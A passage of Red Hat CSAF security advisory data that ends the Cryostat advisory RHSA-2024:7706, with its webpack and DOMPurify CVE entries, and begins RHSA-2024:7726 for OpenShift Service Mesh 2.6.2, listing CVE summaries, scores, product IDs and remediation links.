"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7706", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-45801", cwe: { id: "CWE-1333", name: "Inefficient Regular Expression Complexity", }, discovery_date: "2024-09-16T19:20:09.863249+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2312631", }, ], notes: [ { category: "description", text: "A flaw was found in DOMPurify. This issue may allow an attacker to use specially-crafted HTML to bypass the depth checking or use Prototype Pollution to weaken the depth check, which can lead to cross site scripting (XSS) attacks.", title: "Vulnerability description", }, { category: "summary", text: "dompurify: XSS vulnerability via prototype pollution", title: "Vulnerability summary", }, { category: "other", text: "The vulnerability in DOMPurify, while significant, is categorized as moderate severity rather than important due to its specific conditions for exploitation. The issue requires not only a sophisticated nesting technique to bypass the depth checks but also the ability to leverage Prototype Pollution to weaken these protections. This makes the attack scenario relatively complex and less likely to be encountered in general use cases. Furthermore, the flaw impacts only certain configurations and usage patterns, thus reducing its immediate risk.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45801", }, { category: "external", summary: "RHBZ#2312631", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2312631", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45801", url: "https://www.cve.org/CVERecord?id=CVE-2024-45801", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45801", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45801", }, { category: "external", summary: "https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21", url: "https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21", }, { category: "external", summary: "https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc", url: "https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc", }, { category: "external", summary: "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674", url: "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674", }, ], release_date: "2024-09-16T19:16:11.080000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T01:12:29+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7706", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 7, baseSeverity: "HIGH", confidentialityImpact: "LOW", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L", version: "3.1", }, products: [ "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "dompurify: XSS vulnerability via prototype pollution", }, ], }
rhsa-2024:7726
Vulnerability from csaf_redhat
Published
2024-10-07 09:24
Modified
2025-04-10 00:21
Summary
Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.6.2
Notes
Topic
Red Hat OpenShift Service Mesh Containers for 2.6.2
This update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a
detailed severity rating, is available for each vulnerability from the CVE
link(s) in the References section.
Details
Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.
Security Fix(es):
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
* express: Improper Input Handling in Express Redirects (CVE-2024-43796)
* path-to-regexp: Backtracking regular expressions cause ReDoS (CVE-2024-45296)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule
(CVE-2024-43788)
* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)
* envoy: Malicious log injection via access logs (CVE-2024-45808)
* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)
* envoy: Envoy crashes for `LocalReply` in HTTP async client (CVE-2024-45810)
* curl: libcurl: ASN.1 date parser overread (CVE-2024-7264)
* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Red Hat OpenShift Service Mesh Containers for 2.6.2\n\nThis update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a\ndetailed severity rating, is available for each vulnerability from the CVE\nlink(s) in the References section.", title: "Topic", }, { category: "general", text: "Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.\n\nSecurity Fix(es):\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n* express: Improper Input Handling in Express Redirects (CVE-2024-43796)\n* path-to-regexp: Backtracking regular expressions cause ReDoS (CVE-2024-45296)\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule\n(CVE-2024-43788)\n* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)\n* envoy: Malicious log injection via access logs (CVE-2024-45808)\n* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)\n* envoy: Envoy crashes for `LocalReply` in HTTP async client (CVE-2024-45810)\n* curl: libcurl: ASN.1 date parser overread (CVE-2024-7264)\n* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:7726", url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2301888", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2301888", }, { category: "external", summary: "2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "2310908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310908", }, { category: "external", summary: "2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "2313683", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313683", }, { category: "external", summary: "2313685", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313685", }, { category: "external", summary: "2313687", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313687", }, { category: "external", summary: "OSSM-3337", url: "https://issues.redhat.com/browse/OSSM-3337", }, { category: "external", summary: "OSSM-8001", url: "https://issues.redhat.com/browse/OSSM-8001", }, { category: "external", summary: "OSSM-8099", url: "https://issues.redhat.com/browse/OSSM-8099", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7726.json", }, ], title: "Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.6.2", tracking: { current_release_date: "2025-04-10T00:21:36+00:00", generator: { date: "2025-04-10T00:21:36+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.2", }, }, id: "RHSA-2024:7726", initial_release_date: "2024-10-07T09:24:48+00:00", revision_history: [ { date: "2024-10-07T09:24:48+00:00", number: "1", summary: "Initial version", }, { date: "2024-10-07T09:24:48+00:00", number: "2", summary: "Last updated version", }, { date: "2025-04-10T00:21:36+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "RHOSSM 2.6 for RHEL 8", product: { 